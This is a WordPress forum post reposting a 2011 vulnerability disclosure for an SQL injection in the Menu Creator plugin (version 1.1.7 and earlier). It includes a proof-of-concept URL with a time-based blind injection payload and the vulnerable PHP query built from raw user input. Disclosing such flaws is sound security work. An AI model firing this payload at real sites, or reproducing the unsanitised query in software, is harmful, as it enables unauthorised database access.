Title: Menu Creator Vulnerability
Last modified: August 20, 2016

---

# Menu Creator Vulnerability

 *  [sharingamak](https://wordpress.org/support/users/sharingamak/)
 * (@sharingamak)
 * [14 years, 9 months ago](https://wordpress.org/support/topic/wordpress-menu-creator-plugin/)
 * # Exploit Title: WordPress Menu Creator plugin <= 1.1.7 SQL Injection Vulnerability
   #
   Date: 2011-08-18 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com [@stamparm](https://wordpress.org/support/users/stamparm/))#
   Software Link: [http://downloads.wordpress.org/plugin/wp-menu-creator.1.1.7.zip](http://downloads.wordpress.org/plugin/wp-menu-creator.1.1.7.zip)#
   Version: 1.1.7 (tested)
 * —
    PoC — [http://www.site.com/wp-content/plugins/wp-menu-creator/updateSortOrder.php?menu_id=-1](http://www.site.com/wp-content/plugins/wp-menu-creator/updateSortOrder.php?menu_id=-1)
   AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
 * —————
    Vulnerable code ————— $menu_id = $_GET[‘menu_id’]; … $first_item = $wpdb-
   >get_row(“SELECT * FROM ” . $wpdb->prefix.”menuitems WHERE `order`=0 AND `parent`
   =0 AND menu = $menu_id”);
 * [http://wordpress.org/extend/plugins/wp-menu-creator/](http://wordpress.org/extend/plugins/wp-menu-creator/)

The topic ‘Menu Creator Vulnerability’ is closed to new replies.

 * ![](https://s.w.org/plugins/geopattern-icon/wp-menu-creator.svg)
 * [WordPress Menu Creator](https://wordpress.org/plugins/wp-menu-creator/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/wp-menu-creator/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/wp-menu-creator/)
 * [Active Topics](https://wordpress.org/support/plugin/wp-menu-creator/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/wp-menu-creator/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/wp-menu-creator/reviews/)

 * 0 replies
 * 1 participant
 * Last reply from: [sharingamak](https://wordpress.org/support/users/sharingamak/)
 * Last activity: [14 years, 9 months ago](https://wordpress.org/support/topic/wordpress-menu-creator-plugin/)
 * Status: not resolved